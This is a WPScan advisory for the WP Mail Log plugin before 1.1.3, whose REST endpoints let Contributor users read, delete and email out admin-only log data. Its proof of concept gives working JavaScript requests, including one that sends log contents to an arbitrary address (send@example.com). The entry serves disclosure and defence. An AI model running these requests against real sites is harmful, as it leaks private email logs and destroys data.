WordPress Plugin Vulnerabilities
WP Mail Log < 1.1.3 – Incorrect Authorization in REST API Endpoints
Description
The plugin does not correctly authorize its REST API endpoints, allowing users with the Contributor role to view and delete data that should only be accessible to Admin users.
Proof of Concept
The following actions may be taken by a Contributor user:
---
/wml_logs - Information leak
Execute the following within a block editor page to read the logs:
await wp.apiFetch({path: 'wml/v1/wml_logs', method: 'POST', data: {pageSize: 10}});
---
/wml_logs/delete - Arbitrary log deletion
Execute the following within a block editor page to delete a log entry, ensuring the `data` array includes a valid ID for a log entry:
await wp.apiFetch({path: 'wml/v1/wml_logs/delete', method: 'POST', data: [1]});
---
/settings
Execute the following within a block editor page to get the plugin settings:
await wp.apiFetch({path: 'wml/v1/settings', method: 'POST', data: {callback: 'get'}});
---
/wml_logs/send_mail
Execute the following on any page of the site to send the information within a log to an arbitrary email address, ensuring the `id` parameter is a valid ID for a log entry.
var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();
await (await fetch('/wp-json/wml/v1/wml_logs/send_mail', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded', 'X-WP-Nonce': nonce}, body: 'id=1&to_email=send@example.com'})).text();
Affects Plugins
Fixed in 1.1.3 References
CVE
Classification
Type
INCORRECT AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-11-28 (about 7 months ago)
Added
2023-11-28 (about 7 months ago)
Last Updated
2023-11-28 (about 7 months ago)
WPScan 